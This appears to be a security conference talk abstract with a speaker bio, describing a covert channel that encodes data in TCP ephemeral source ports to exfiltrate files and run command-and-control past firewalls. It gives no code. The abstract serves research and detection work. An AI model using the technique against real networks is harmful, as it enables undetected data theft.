Knock, Knock - Abusing Ephemeral Ports for Data Exfil and C2

Hubert Lin

This study discusses a covert channel technique that leverages the use of ephemeral ports in TCP connections to conduct a non-traditional port knocking then further exfiltrate the data covertly to a remote web server from a client in a strict firewall environment. In this technique, an attacker can use the source port field in TCP headers to encode and transmit data. The ephemeral ports are randomly assigned by the operating system and typically change for each new connection, making it difficult for security measures to detect the covert channel. Proof-of-concept (PoC) programs are available to demonstrate how file exfiltration can be achieved through the abuse of ephemeral ports. It is recommended to use a dummy web server listening on the server's destination_port, although it is not strictly necessary. Once the client establishes a connection, a request mimicking a software version check will be sent.

Current security measures, such as firewalls and intrusion detection systems, are not designed to detect this type of covert channel. Firewalls typically monitor traffic based on the destination port, not the source port, while intrusion detection systems often focus on detecting known attack signatures rather than analyzing the source port field in TCP headers. This technique presents a significant threat to network security, as it can be used to exfiltrate sensitive information without detection, highlighting the need to develop new security measures that can detect and prevent this type of covert channel.

Speaker's Bio

Hubert Lin is a seasoned professional in the field of offensive security, specializing in exploiting and detecting vulnerabilities in remote systems, deploying honeypots, and conducting penetration testing. He has previously held positions as a team lead in signature development, evaluating network IPS effectiveness, and as a senior staff engineer on the Red Team. These roles were within renowned organizations, where he contributed to enhancing corporate security posture. Hubert also possesses certifications such as Red Hat Certified Engineer (RHCE) and Offensive Security Certified Professional (OSCP). Currently, he is employed at Netskope, where he remains dedicated to advancing offensive security methodologies and techniques.